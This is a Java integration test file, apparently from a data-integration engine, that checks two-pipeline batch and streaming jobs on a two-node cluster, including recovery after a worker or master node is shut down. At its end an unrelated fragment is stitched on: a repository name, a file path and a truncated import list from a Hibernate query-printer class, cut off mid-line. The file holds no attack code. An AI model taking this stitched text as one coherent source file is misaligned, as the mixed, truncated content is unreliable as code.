    public static final String DYNAMIC_TEST_ROW_NUM_PER_PARALLELISM =
            "dynamic_test_row_num_per_parallelism";

    public static final String DYNAMIC_TEST_PARALLELISM = "dynamic_test_parallelism";

    /**
     * Happy-path batch test: a two-pipeline batch job runs to FINISHED on a healthy 2-node
     * cluster, and the sink contains rowNumber * parallelism * 2 lines (two pipelines).
     */
    @Test
    public void testTwoPipelineBatchJobRunOkIn2Node() throws Exception {
        String testCaseName = "testTwoPipelineBatchJobRunOkIn2Node";
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRunOkIn2Node";
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        // Use a per-test cluster name so concurrent test runs do not join each other's cluster.
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.BATCH,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            // Wait until the job is actually scheduled and RUNNING before watching for completion.
            Awaitility.await()
                    .atMost(60000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            JobStatus.RUNNING, clientJobProxy.getJobStatus()));

            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete);

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                log.warn(
                                        "\n================================={}=================================\n",
                                        FileUtils.getFileLineNumberFromDir(
                                                testResources.getLeft()));
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, objectCompletableFuture.get());
                            });

            // Two pipelines write to the same target dir, hence the factor of 2.
            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }

    /**
     * Create the test job config file basic on cluster_batch_fake_to_localfile_template.conf It
     * will delete the test sink target path before return the final job config file path
     *
     * @param testCaseName testCaseName
     * @param jobMode jobMode
     * @param rowNumber row.num per FakeSource parallelism
     * @param parallelism FakeSource parallelism
     * @param templateFileName name of the config template whose placeholders are substituted
     * @return pair of (sink target directory, generated job config file path)
     * @throws IOException if the config file cannot be written
     */
    private ImmutablePair<String, String> createTestResources(
            @NonNull String testCaseName,
            @NonNull JobMode jobMode,
            long rowNumber,
            int parallelism,
            @NonNull String templateFileName)
            throws IOException {
        checkArgument(rowNumber > 0, "rowNumber must greater than 0");
        checkArgument(parallelism > 0, "parallelism must greater than 0");
        Map<String, String> valueMap = new HashMap<>();
        valueMap.put(DYNAMIC_TEST_CASE_NAME, testCaseName);
        valueMap.put(DYNAMIC_JOB_MODE, jobMode.toString());
        valueMap.put(DYNAMIC_TEST_ROW_NUM_PER_PARALLELISM, String.valueOf(rowNumber));
        valueMap.put(DYNAMIC_TEST_PARALLELISM, String.valueOf(parallelism));

        String targetDir = "/tmp/hive/warehouse/" + testCaseName;
        targetDir = targetDir.replace("/", File.separator);
        // clear target dir before test
        FileUtils.createNewDir(targetDir);

        String targetConfigFilePath =
                File.separator
                        + "tmp"
                        + File.separator
                        + "test_conf"
                        + File.separator
                        + testCaseName
                        + ".conf";
        TestUtils.createTestConfigFileFromTemplate(templateFileName, valueMap, targetConfigFilePath);

        return new ImmutablePair<>(targetDir, targetConfigFilePath);
    }

    /**
     * Happy-path streaming test: a two-pipeline streaming job on a healthy 2-node cluster must
     * write the full expected row count while staying RUNNING, then reach CANCELED after an
     * explicit cancel, with no extra rows written.
     */
    @Test
    public void testTwoPipelineStreamJobRunOkIn2Node() throws Exception {
        String testCaseName = "testTwoPipelineStreamJobRunOkIn2Node";
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRunOkIn2Node";
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.STREAMING,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            // ordinal() comparison accepts RUNNING or any later state (the job may already have
            // progressed past RUNNING by the time we poll).
            Awaitility.await()
                    .atMost(10, TimeUnit.SECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertTrue(
                                            clientJobProxy.getJobStatus().ordinal()
                                                    >= JobStatus.RUNNING.ordinal()));

            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete);

            // A streaming job never finishes on its own: wait until all expected rows are in the
            // sink while the job stays RUNNING.
            Awaitility.await()
                    .atMost(5, TimeUnit.MINUTES)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertEquals(
                                        testRowNumber * testParallelism * 2, lineNumberFromDir);
                            });

            clientJobProxy.cancelJob();

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, objectCompletableFuture.get());
                            });

            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }

    /**
     * Fault-tolerance batch test: kill a worker node (node2) while the job is mid-run; the job
     * must restore on the surviving node, finish, and still produce exactly the expected row
     * count (data-consistency check after recovery).
     */
    @Test
    public void testTwoPipelineBatchJobRestoreIn2NodeWorkerDown() throws Exception {
        String testCaseName = "testTwoPipelineBatchJobRestoreIn2NodeWorkerDown";
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRestoreIn2NodeWorkerDown";
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.BATCH,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            // lineNumberFromDir > 1 guarantees the sink has started receiving data, i.e. the
            // failure below happens mid-run rather than before the job produced anything.
            Awaitility.await()
                    .atMost(60000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(lineNumberFromDir > 1);
                            });

            // In the restore case, ensure that JobStatus is in the RUNNING state before calling
            // waitForJobComplete.
            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete);

            // shutdown on worker node
            node2.shutdown();

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                log.warn(
                                        "\n================================={}=================================\n",
                                        FileUtils.getFileLineNumberFromDir(
                                                testResources.getLeft()));
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, objectCompletableFuture.get());
                            });

            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }

    /**
     * Manual stress helper (disabled by default): repeats the stream master-down restore test
     * 200 times to flush out flaky recovery behavior.
     */
    @Test
    @Disabled
    public void testFor() throws Exception {
        for (int i = 0; i < 200; i++) {
            testTwoPipelineStreamJobRestoreIn2NodeMasterDown();
        }
    }

    /**
     * Fault-tolerance streaming test: kill a worker node (node2) while the streaming job is
     * mid-run; the job must restore, keep RUNNING, and converge on exactly the expected row
     * count (no lost and no duplicated rows), then cancel cleanly.
     */
    @Test
    public void testTwoPipelineStreamJobRestoreIn2NodeWorkerDown() throws Exception {
        String testCaseName = "testTwoPipelineStreamJobRestoreIn2NodeWorkerDown";
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRestoreIn2NodeWorkerDown";
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.STREAMING,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(lineNumberFromDir > 1);
                            });

            // In the restore case, ensure that JobStatus is in the RUNNING state before calling
            // waitForJobComplete.
            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(() -> clientJobProxy.waitForJobComplete());
            Thread.sleep(5000);
            // shutdown on worker node
            node2.shutdown();

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertEquals(
                                        testRowNumber * testParallelism * 2, lineNumberFromDir);
                            });

            // sleep 10s and expect the job don't write more rows.
            Thread.sleep(10000);
            clientJobProxy.cancelJob();

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, objectCompletableFuture.get());
                            });

            // check the final rows
            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }

    /**
     * Fault-tolerance batch test: kill the master node (node1) mid-run; the job must fail over
     * to the surviving node, finish, and still produce exactly the expected row count. Test and
     * cluster names are timestamped so repeated runs (see {@link #testFor()}) never collide.
     */
    @Test
    public void testTwoPipelineBatchJobRestoreIn2NodeMasterDown() throws Exception {
        String testCaseName =
                "testTwoPipelineBatchJobRestoreIn2NodeMasterDown" + System.currentTimeMillis();
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineBatchJobRestoreIn2NodeMasterDown"
                        + System.currentTimeMillis();
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.BATCH,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(lineNumberFromDir > 1);
                            });

            // In the restore case, ensure that JobStatus is in the RUNNING state before calling
            // waitForJobComplete.
            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete);

            // shutdown master node
            node1.shutdown();
            log.info(
                    "=============================shutdown node1===================================");

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                log.warn(
                                        "\n================================={}=================================\n",
                                        FileUtils.getFileLineNumberFromDir(
                                                testResources.getLeft()));
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.FINISHED, objectCompletableFuture.get());
                            });

            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }

    /**
     * Fault-tolerance streaming test: kill the master node (node1) while the streaming job is
     * mid-run; the job must fail over, keep RUNNING, converge on exactly the expected row count
     * (data consistency after master failover), then cancel cleanly. Names are timestamped so
     * repeated runs never collide.
     */
    @Test
    public void testTwoPipelineStreamJobRestoreIn2NodeMasterDown() throws Exception {
        String testCaseName =
                "testTwoPipelineStreamJobRestoreIn2NodeMasterDown" + System.currentTimeMillis();
        String testClusterName =
                "ClusterFaultToleranceTwoPipelineIT_testTwoPipelineStreamJobRestoreIn2NodeMasterDown"
                        + System.currentTimeMillis();
        long testRowNumber = 1000;
        int testParallelism = 6;
        HazelcastInstanceImpl node1 = null;
        HazelcastInstanceImpl node2 = null;
        SeaTunnelClient engineClient = null;

        SeaTunnelConfig seaTunnelConfig = ConfigProvider.locateAndGetSeaTunnelConfig();
        seaTunnelConfig
                .getHazelcastConfig()
                .setClusterName(TestUtils.getClusterName(testClusterName));
        try {
            node1 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);
            node2 = SeaTunnelServerStarter.createHazelcastInstance(seaTunnelConfig);

            // waiting all node added to cluster
            HazelcastInstanceImpl finalNode = node1;
            Awaitility.await()
                    .atMost(10000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () ->
                                    Assertions.assertEquals(
                                            2, finalNode.getCluster().getMembers().size()));

            Common.setDeployMode(DeployMode.CLIENT);
            ImmutablePair<String, String> testResources =
                    createTestResources(
                            testCaseName,
                            JobMode.STREAMING,
                            testRowNumber,
                            testParallelism,
                            TEST_TEMPLATE_FILE_NAME);
            JobConfig jobConfig = new JobConfig();
            jobConfig.setName(testCaseName);

            ClientConfig clientConfig = ConfigProvider.locateAndGetClientConfig();
            clientConfig.setClusterName(TestUtils.getClusterName(testClusterName));
            engineClient = new SeaTunnelClient(clientConfig);
            ClientJobExecutionEnvironment jobExecutionEnv =
                    engineClient.createExecutionContext(
                            testResources.getRight(), jobConfig, seaTunnelConfig);
            ClientJobProxy clientJobProxy = jobExecutionEnv.execute();
            Awaitility.await()
                    .atMost(360000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(lineNumberFromDir > 1);
                            });

            // In the restore case, ensure that JobStatus is in the RUNNING state before calling
            // waitForJobComplete.
            CompletableFuture<JobStatus> objectCompletableFuture =
                    CompletableFuture.supplyAsync(clientJobProxy::waitForJobComplete);

            // shutdown master node
            node1.shutdown();

            Awaitility.await()
                    .atMost(300000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Long lineNumberFromDir =
                                        FileUtils.getFileLineNumberFromDir(testResources.getLeft());
                                log.warn(
                                        "\n================================={}=================================\n",
                                        lineNumberFromDir);
                                Assertions.assertEquals(
                                        JobStatus.RUNNING, clientJobProxy.getJobStatus());
                                Assertions.assertEquals(
                                        testRowNumber * testParallelism * 2, lineNumberFromDir);
                            });

            // sleep 10s and expect the job don't write more rows.
            Thread.sleep(10000);
            clientJobProxy.cancelJob();

            Awaitility.await()
                    .atMost(350000, TimeUnit.MILLISECONDS)
                    .pollInterval(2000, TimeUnit.MILLISECONDS)
                    .untilAsserted(
                            () -> {
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, clientJobProxy.getJobStatus());
                                Assertions.assertTrue(objectCompletableFuture.isDone());
                                Assertions.assertEquals(
                                        JobStatus.CANCELED, objectCompletableFuture.get());
                            });

            // check the final rows
            Long fileLineNumberFromDir =
                    FileUtils.getFileLineNumberFromDir(testResources.getLeft());
            Assertions.assertEquals(testRowNumber * testParallelism * 2, fileLineNumberFromDir);
        } finally {
            if (engineClient != null) {
                engineClient.close();
            }

            if (node1 != null) {
                node1.shutdown();
            }

            if (node2 != null) {
                node2.shutdown();
            }
        }
    }
}
hibernate/hibernate-orm
33,297
hibernate-core/src/main/java/org/hibernate/query/sqm/internal/SqmTreePrinter.java
/* * SPDX-License-Identifier: Apache-2.0 * Copyright Red Hat Inc. and Hibernate Authors */ package org.hibernate.query.sqm.internal; import java.util.List; import java.util.Locale; import org.hibernate.query.sqm.DiscriminatorSqmPath; import org.hibernate.metamodel.model.domain.internal.AnyDiscriminatorSqmPath; import org.hibernate.query.QueryLogging; import org.hibernate.query.sqm.SemanticQueryWalker; import org.hibernate.query.sqm.tree.SqmStatement; import org.hibernate.query.sqm.tree.cte.SqmCteContainer; import org.hibernate.query.sqm.tree.cte.SqmCteStatement; import org.hibernate.query.sqm.tree.delete.SqmDeleteStatement; import org.hibernate.query.sqm.tree.domain.NonAggregatedCompositeSimplePath; import org.hibernate.query.sqm.tree.domain.SqmAnyValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmBasicValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmCorrelation; import org.hibernate.query.sqm.tree.domain.SqmCteRoot; import org.hibernate.query.sqm.tree.domain.SqmDerivedRoot; import org.hibernate.query.sqm.tree.domain.SqmEmbeddedValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmEntityValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmFkExpression; import org.hibernate.query.sqm.tree.domain.SqmFunctionPath; import org.hibernate.query.sqm.tree.domain.SqmFunctionRoot; import org.hibernate.query.sqm.tree.domain.SqmIndexedCollectionAccessPath; import org.hibernate.query.sqm.tree.domain.SqmMapEntryReference; import org.hibernate.query.sqm.tree.domain.SqmElementAggregateFunction; import org.hibernate.query.sqm.tree.domain.SqmIndexAggregateFunction; import org.hibernate.query.sqm.tree.domain.SqmPluralPartJoin; import org.hibernate.query.sqm.tree.domain.SqmPluralValuedSimplePath; import org.hibernate.query.sqm.tree.domain.SqmTreatedPath; import org.hibernate.query.sqm.tree.expression.AsWrapperSqmExpression; import org.hibernate.query.sqm.tree.expression.JpaCriteriaParameter; import 
org.hibernate.query.sqm.tree.expression.SqmAny; import org.hibernate.query.sqm.tree.expression.SqmAnyDiscriminatorValue; import org.hibernate.query.sqm.tree.expression.SqmBinaryArithmetic; import org.hibernate.query.sqm.tree.expression.SqmByUnit; import org.hibernate.query.sqm.tree.expression.SqmCaseSearched; import org.hibernate.query.sqm.tree.expression.SqmCaseSimple; import org.hibernate.query.sqm.tree.expression.SqmCastTarget; import org.hibernate.query.sqm.tree.expression.SqmCoalesce; import org.hibernate.query.sqm.tree.expression.SqmCollation; import org.hibernate.query.sqm.tree.expression.SqmCollectionSize; import org.hibernate.query.sqm.tree.expression.SqmDistinct; import org.hibernate.query.sqm.tree.expression.SqmDurationUnit; import org.hibernate.query.sqm.tree.expression.SqmEnumLiteral; import org.hibernate.query.sqm.tree.expression.SqmEvery; import org.hibernate.query.sqm.tree.expression.SqmExpression; import org.hibernate.query.sqm.tree.expression.SqmExtractUnit; import org.hibernate.query.sqm.tree.expression.SqmFieldLiteral; import org.hibernate.query.sqm.tree.expression.SqmFormat; import org.hibernate.query.sqm.tree.expression.SqmFunction; import org.hibernate.query.sqm.tree.expression.SqmHqlNumericLiteral; import org.hibernate.query.sqm.tree.expression.SqmLiteral; import org.hibernate.query.sqm.tree.expression.SqmLiteralEmbeddableType; import org.hibernate.query.sqm.tree.expression.SqmLiteralEntityType; import org.hibernate.query.sqm.tree.expression.SqmModifiedSubQueryExpression; import org.hibernate.query.sqm.tree.expression.SqmNamedExpression; import org.hibernate.query.sqm.tree.expression.SqmNamedParameter; import org.hibernate.query.sqm.tree.expression.SqmOver; import org.hibernate.query.sqm.tree.expression.SqmOverflow; import org.hibernate.query.sqm.tree.expression.SqmParameterizedEntityType; import org.hibernate.query.sqm.tree.expression.SqmPositionalParameter; import org.hibernate.query.sqm.tree.expression.SqmSetReturningFunction; import 
org.hibernate.query.sqm.tree.expression.SqmStar; import org.hibernate.query.sqm.tree.expression.SqmSummarization; import org.hibernate.query.sqm.tree.expression.SqmToDuration; import org.hibernate.query.sqm.tree.expression.SqmTrimSpecification; import org.hibernate.query.sqm.tree.expression.SqmTuple; import org.hibernate.query.sqm.tree.expression.SqmUnaryOperation; import org.hibernate.query.sqm.tree.expression.SqmWindow; import org.hibernate.query.sqm.tree.from.SqmAttributeJoin; import org.hibernate.query.sqm.tree.from.SqmCrossJoin; import org.hibernate.query.sqm.tree.from.SqmCteJoin; import org.hibernate.query.sqm.tree.from.SqmDerivedJoin; import org.hibernate.query.sqm.tree.from.SqmEntityJoin; import org.hibernate.query.sqm.tree.from.SqmFrom; import org.hibernate.query.sqm.tree.from.SqmFromClause; import org.hibernate.query.sqm.tree.from.SqmFunctionJoin; import org.hibernate.query.sqm.tree.from.SqmJoin; import org.hibernate.query.sqm.tree.from.SqmRoot; import org.hibernate.query.sqm.tree.insert.SqmConflictClause; import org.hibernate.query.sqm.tree.insert.SqmConflictUpdateAction; import org.hibernate.query.sqm.tree.insert.SqmInsertSelectStatement; import org.hibernate.query.sqm.tree.insert.SqmInsertValuesStatement; import org.hibernate.query.sqm.tree.insert.SqmValues; import org.hibernate.query.sqm.tree.predicate.SqmBetweenPredicate; import org.hibernate.query.sqm.tree.predicate.SqmBooleanExpressionPredicate; import org.hibernate.query.sqm.tree.predicate.SqmComparisonPredicate; import org.hibernate.query.sqm.tree.predicate.SqmEmptinessPredicate; import 